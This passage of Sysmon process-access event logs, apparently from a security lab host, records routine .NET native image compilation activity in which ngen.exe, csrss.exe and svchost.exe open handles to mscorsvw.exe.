+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.507","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21FF-5F25-0000-0010FBC90A00}","TargetProcessId":"2972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6989,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.507\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21FF-5F25-0000-0010FBC90A00}\r\nTargetProcessId: 2972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.507","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21FF-5F25-0000-0010FBC90A00}","TargetProcessId":"2972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6990,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.507\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21FF-5F25-0000-0010FBC90A00}\r\nTargetProcessId: 2972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.507","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21FF-5F25-0000-0010FBC90A00}","TargetProcessId":"2972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6991,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.710\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010767B0B00}\r\nTargetProcessId: 4856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.710","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010767B0B00}","TargetProcessId":"4856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6992,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.710\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010767B0B00}\r\nTargetProcessId: 4856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.710","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010767B0B00}","TargetProcessId":"4856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6993,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.710\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010767B0B00}\r\nTargetProcessId: 4856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.710","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010767B0B00}","TargetProcessId":"4856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6994,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.773\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010E07E0B00}\r\nTargetProcessId: 2704\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.773","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010E07E0B00}","TargetProcessId":"2704","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6995,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.773\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010E07E0B00}\r\nTargetProcessId: 2704\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.773","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010E07E0B00}","TargetProcessId":"2704","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6996,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.773\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010E07E0B00}\r\nTargetProcessId: 2704\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 